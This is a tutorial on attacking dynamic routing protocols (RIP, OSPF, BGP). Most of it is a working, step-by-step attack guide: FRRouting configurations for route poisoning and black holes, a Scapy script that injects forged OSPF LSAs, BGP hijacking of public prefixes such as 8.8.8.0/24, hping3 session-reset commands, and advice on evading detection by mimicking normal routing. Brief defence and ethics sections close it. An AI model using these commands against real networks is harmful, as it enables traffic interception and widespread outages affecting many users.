Routing Protocol Attacks

Understanding Routing Protocol Attacks - Dynamic Routing Manipulation

What is Routing Protocol Attacks?

Simple Definition: Routing protocol attacks manipulate dynamic routing protocols like RIP, OSPF, and BGP to redirect network traffic, create routing loops, or cause network outages by injecting false routing information into network infrastructure.

Technical Definition: Routing protocol attacks exploit vulnerabilities in dynamic routing protocols to inject malicious routing advertisements, manipulate route metrics, establish unauthorized peering relationships, or corrupt routing tables to achieve traffic interception, network disruption, or security control bypass.

Why Routing Protocol Attacks Work

Routing protocol attacks succeed due to inherent protocol design limitations and implementation weaknesses:

• Trust-Based Design: Most routing protocols trust received routing updates without strong authentication
• Automatic Convergence: Routers automatically accept and propagate routing changes throughout the network
• Metric Manipulation: Attackers can advertise better routes to hijack traffic flows
• Weak Authentication: Many deployments lack or use weak authentication mechanisms

Attack Process Breakdown

Normal Routing Protocol Operation

1. Neighbor Discovery: Routers discover adjacent routers through hello packets
2. Topology Exchange: Share routing table information with neighbors
3. Route Calculation: Compute best paths using protocol-specific metrics
4. Table Updates: Install optimal routes in routing and forwarding tables
5. Convergence: Network achieves consistent routing state across all routers

Routing Attack Exploitation

1. Protocol Analysis: Identify routing protocol in use and authentication status
2. Neighbor Spoofing: Establish unauthorized adjacencies with target routers
3. Route Injection: Advertise malicious routes with attractive metrics
4. Traffic Hijacking: Intercept traffic flows through advertised routes
5. Network Disruption: Create routing loops or black holes to deny service

Real-World Impact

Traffic Interception: Redirect network traffic through attacker-controlled infrastructure for man-in-the-middle attacks

Service Disruption: Create routing black holes or loops causing widespread network outages

Corporate Network Compromise: Access internal networks by manipulating enterprise routing protocols

ISP-Level Attacks: BGP hijacking can redirect internet traffic affecting millions of users

Financial Impact: Cryptocurrency hijacking and financial transaction interception through route manipulation

Technical Concepts

Routing Information Protocol (RIP)

Protocol Characteristics:

• Distance vector routing protocol
• Uses hop count as metric (maximum 15 hops)
• Periodic updates every 30 seconds
• Minimal authentication capabilities

Attack Vectors:

• Route poisoning with false metric information
• Routing loop creation through metric manipulation
• Unauthorized route advertisement

Open Shortest Path First (OSPF)

Protocol Characteristics:

• Link-state routing protocol
• Uses cost-based metrics
• Area-based hierarchical design
• Supports authentication mechanisms

Attack Vectors:

• LSA (Link State Advertisement) injection
• Hello packet manipulation
• Router ID spoofing
• Area flooding attacks

Border Gateway Protocol (BGP)

Protocol Characteristics:

• Path vector routing protocol
• Used for inter-domain routing
• AS (Autonomous System) path attributes
• Policy-based routing decisions

Attack Vectors:

• Route hijacking through false origination
• Path manipulation through AS prepending
• BGP session hijacking
• Prefix deaggregation attacks

Technical Implementation

Prerequisites

Network Requirements:

• Access to network segment with routing protocols enabled
• Understanding of network topology and routing domains
• Ability to establish routing protocol adjacencies

Essential Tools:

• FRRouting: Open source routing protocol suite
• Quagga: Routing software package
• Scapy: Custom routing packet crafting
• TCPDump: Routing protocol traffic analysis

Essential Command Sequence

Step 1: Routing Protocol Discovery

# Identify active routing protocols
tcpdump -i eth0 -v 'port 179 or port 520 or proto 89'
# Port 179: BGP traffic
# Port 520: RIP traffic  
# Proto 89: OSPF traffic
# Captures routing protocol communications

# Analyze OSPF hello packets
tcpdump -i eth0 -v 'proto 89 and ip[9] == 1'
# OSPF type 1 = Hello packets
# Reveals area IDs, router IDs, and authentication

# Monitor RIP updates
tcpdump -i eth0 -v 'port 520'
# Shows routing table exchanges
# Identifies network prefixes and metrics
# Reveals RIP version and authentication status

Purpose: Identify which routing protocols are active and analyze their current configuration and security status.

Step 2: RIP Attack Implementation

Install and Configure Routing Software:

# Install FRRouting for protocol testing
apt update && apt install frr

# Configure RIP routing daemon
cat > /etc/frr/ripd.conf << EOF
!
router rip
 version 2
 network 192.168.1.0/24
 redistribute connected
 no auto-summary
!
EOF

# Start RIP daemon
systemctl start frr
systemctl enable frr
vtysh -c "conf t" -c "router rip" -c "network 192.168.1.0/24"

RIP Route Poisoning Attack:

# Advertise malicious routes with better metrics
vtysh << EOF
configure terminal
router rip
network 0.0.0.0/0
redistribute static metric 1
exit
ip route 10.0.0.0/8 null0
ip route 172.16.0.0/12 null0
ip route 192.168.0.0/16 null0
exit
write memory
EOF

# Monitor route propagation
tcpdump -i eth0 -v 'port 520' | grep -E "(10\.|172\.|192\.)"
# Watch for malicious routes being advertised
# Verify route injection success

Step 3: OSPF Manipulation

OSPF LSA Injection with Scapy:

#!/usr/bin/env python3
from scapy.all import *

# Craft malicious OSPF LSA
ospf_lsa = IP(src="192.168.1.10", dst="224.0.0.5")/\
           OSPF_Hdr(type=4, area="0.0.0.1")/\
           OSPF_LSUpd(lsalist=[
               OSPF_Router_LSA(
                   adrouter="1.1.1.1",
                   seq=0x80000001,
                   linklist=[
                       OSPF_Link(id="10.0.0.0", data="255.0.0.0", metric=1)
                   ]
               )
           ])

# Send malicious LSA
send(ospf_lsa)

Manual OSPF Configuration Attack:

# Configure OSPF with malicious advertisements
vtysh << EOF
configure terminal
router ospf
 network 192.168.1.0/24 area 0
 area 0 stub
 redistribute static subnets
exit
ip route 10.0.0.0/8 null0
ip route 172.16.0.0/12 null0
exit
write memory
EOF

# Monitor OSPF database changes
vtysh -c "show ip ospf database"
# Verify LSA injection and propagation
# Check route installation in routing table

Step 4: BGP Hijacking Techniques

Basic BGP Session Establishment:

# Configure BGP for route injection
vtysh << EOF
configure terminal
router bgp 65001
 bgp router-id 1.1.1.1
 neighbor 192.168.1.1 remote-as 65000
 neighbor 192.168.1.1 description "Target Router"
 network 10.0.0.0/8
 network 172.16.0.0/12
 network 192.168.0.0/16
exit
write memory
EOF

# Monitor BGP session establishment
vtysh -c "show ip bgp summary"
# Check neighbor status and route advertisements
# Verify route propagation to upstream providers

Advanced BGP Route Hijacking:

# Hijack specific prefixes with better AS paths
vtysh << EOF
configure terminal
router bgp 65001
 network 8.8.8.0/24
 network 1.1.1.0/24
exit
route-map HIJACK permit 10
 set as-path prepend 65001
exit
router bgp 65001
 neighbor 192.168.1.1 route-map HIJACK out
exit
write memory
EOF

Step 5: Traffic Redirection Verification

# Monitor traffic interception success
tcpdump -i eth0 -c 100 'not host $(hostname -I | cut -d" " -f1)'
# Capture traffic from other hosts
# Indicates successful route hijacking

# Test specific destination reachability
traceroute 8.8.8.8
# Should show path through attacker system
# Confirms successful route injection

# Verify routing table modifications on targets
# From victim systems:
ip route show
# Look for routes pointing to attacker
# Confirms routing protocol manipulation success

Purpose: Confirm that injected routes are being used and traffic is flowing through attacker-controlled paths.

Attack Variations

Multi-Protocol Coordination

# Coordinate RIP and OSPF attacks
# Use RIP for access networks
systemctl start ripd
# Use OSPF for backbone networks  
systemctl start ospfd
# Create comprehensive routing disruption

Metric Manipulation

# RIP route poisoning with count-to-infinity
vtysh << EOF
configure terminal
router rip
 redistribute static metric 16
exit
ip route 10.0.0.0/8 null0
EOF
# Metric 16 = infinity in RIP
# Creates routing black hole

BGP Session Hijacking

# TCP sequence prediction for BGP hijacking
hping3 -S -p 179 -c 10 192.168.1.1
# Analyze sequence number patterns
# Attempt TCP session takeover for established BGP sessions

# BGP RESET attack
hping3 -R -p 179 -s 179 -a 192.168.1.2 192.168.1.1
# -R: Reset flag
# Terminates BGP sessions causing routing convergence

Common Issues and Solutions

Problem: Unable to establish routing adjacencies

• Solution: Check authentication configuration, verify network connectivity, ensure proper router IDs

Problem: Injected routes not propagated

• Solution: Verify administrative distance, check route filters, ensure proper protocol configuration

Problem: BGP session rejected

• Solution: Verify AS numbers, check peer authentication, ensure proper neighbor configuration

Problem: Attack detected by monitoring systems

• Solution: Use legitimate AS numbers, reduce advertisement frequency, mimic normal routing behavior

Advanced Techniques

Route Leak Attacks

# Configure route leaking between providers
vtysh << EOF
configure terminal
router bgp 65001
 neighbor 192.168.1.1 remote-as 65000
 neighbor 192.168.2.1 remote-as 65002
 # Leak routes between providers
 address-family ipv4
  neighbor 192.168.1.1 route-reflector-client
  neighbor 192.168.2.1 route-reflector-client
 exit-address-family
exit
EOF

Convergence Delay Exploitation

# Time routing updates to maximize disruption
# Send updates during network maintenance windows
# Exploit slow convergence in large networks
while true; do
    vtysh -c "clear ip ospf process"
    sleep 60
done

Multi-Homed Attack Scenarios

# Attack from multiple network connections
# Configure different AS numbers on each interface
# Create conflicting routing advertisements
# Maximize network disruption and traffic capture

Detection and Prevention

Detection Indicators

• Unexpected routing table changes
• New BGP sessions from unknown peers
• Routing loops or suboptimal paths
• Traffic flowing through unexpected routes
• Routing protocol authentication failures

Prevention Measures

Authentication Configuration:

# OSPF authentication
area 0 authentication message-digest
interface eth0
 ip ospf message-digest-key 1 md5 SecurePassword

# BGP authentication
neighbor 192.168.1.1 password SecureBGPPassword

Route Filtering:

# BGP prefix filtering
ip prefix-list ALLOWED permit 10.0.0.0/8 le 24
ip prefix-list ALLOWED deny 0.0.0.0/0 le 32
route-map FILTER permit 10
 match ip address prefix-list ALLOWED

Monitoring and Alerting:

• Deploy routing protocol monitoring systems
• Implement BGP route origin validation (ROV)
• Monitor for unexpected routing changes
• Log all routing protocol adjacency changes

Professional Context

Legitimate Use Cases

• Network Security Testing: Validating routing protocol security configurations
• Disaster Recovery: Testing routing failover and convergence behavior
• Performance Analysis: Understanding routing protocol overhead and convergence times
• Education: Learning routing protocol behavior in controlled environments

Legal and Ethical Requirements

Authorization: Routing attacks can cause widespread network disruption - explicit written permission essential

Scope Definition: Clearly identify which routing domains are in-scope for testing

Impact Assessment: Document potential for service outages and traffic interception

Coordination: Work with network operations teams to minimize business impact

Routing protocol attacks highlight the critical importance of proper authentication, filtering, and monitoring in dynamic routing environments, demonstrating how protocol vulnerabilities can enable large-scale network compromise.